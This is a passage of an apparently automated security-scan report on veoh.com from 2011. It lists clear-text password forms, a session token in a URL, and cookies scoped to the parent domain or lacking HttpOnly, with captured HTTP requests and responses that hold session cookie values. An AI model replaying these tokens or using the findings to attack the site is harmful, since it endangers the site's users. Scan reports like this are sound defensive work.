The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /messages/inbox HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

2.4. http://www.veoh.com/myinterests  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myinterests

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /myinterests HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

2.5. http://www.veoh.com/myplaylists  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myplaylists

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /myplaylists HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 25387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

2.6. http://www.veoh.com/myprofile/videos  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myprofile/videos

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /myprofile/videos HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 25399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

2.7. http://www.veoh.com/publish/video  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /publish/video

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /publish/video HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 25294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

2.8. http://www.veoh.com/register  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /register HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 52657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>

       <form id="form-register" method="POST">

           <fieldset>
...[SNIP]...
</label>
               
<input type="password" name="password" id="password" value="" />                
               <label for="password2">
...[SNIP]...
</label>
               
<input type="password" name="password2" id="password2" value="" />                
               <label for="countryId">
...[SNIP]...

3. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /webplayed.xml

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-HOST: appsrv-api16.els1.veoh.com
Set-Cookie: veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; Domain=.veoh.com; Path=/
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Content-Length: 94
Date: Thu, 03 Feb 2011 20:52:32 GMT


<Response>
   <Result>0</Result>
   <ErrorText></ErrorText>
</Response>

4. Cookie scoped to parent domain  previous  next
There are 3 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


4.1. http://www.veoh.com/webplayed.xml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /webplayed.xml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-HOST: appsrv-api16.els1.veoh.com
Set-Cookie: veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; Domain=.veoh.com; Path=/
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Content-Length: 94
Date: Thu, 03 Feb 2011 20:52:32 GMT


<Response>
   <Result>0</Result>
   <ErrorText></ErrorText>
</Response>

4.2. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

4.3. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=53
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 4 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://www.veoh.com/rest/v2/execute.xml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /rest/v2/execute.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rest/v2/execute.xml?apiKey=5697781E-1C60-663B-FFD8-9B49D2B56D36&method=veoh.video.findByPermalink&permalink=v18978294NGnK88j8& HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
X-HOST: appsrv-api15.els1.veoh.com
Set-Cookie: JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; Path=/
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Content-Length: 5142
Date: Thu, 03 Feb 2011 20:52:31 GMT

<?xml version="1.0" encoding="UTF-8" ?>


<rsp stat="ok" guid="fa50489b-0120-4bd5-943a-f22f1284d848" echo="" requestGeo="US" timestamp="1296766351">
   
   
                                   
...[SNIP]...

5.2. http://www.veoh.com/webplayed.xml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /webplayed.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-HOST: appsrv-api16.els1.veoh.com
Set-Cookie: veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; Domain=.veoh.com; Path=/
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Content-Length: 94
Date: Thu, 03 Feb 2011 20:52:32 GMT


<Response>
   <Result>0</Result>
   <ErrorText></ErrorText>
</Response>

5.3. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

5.4. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
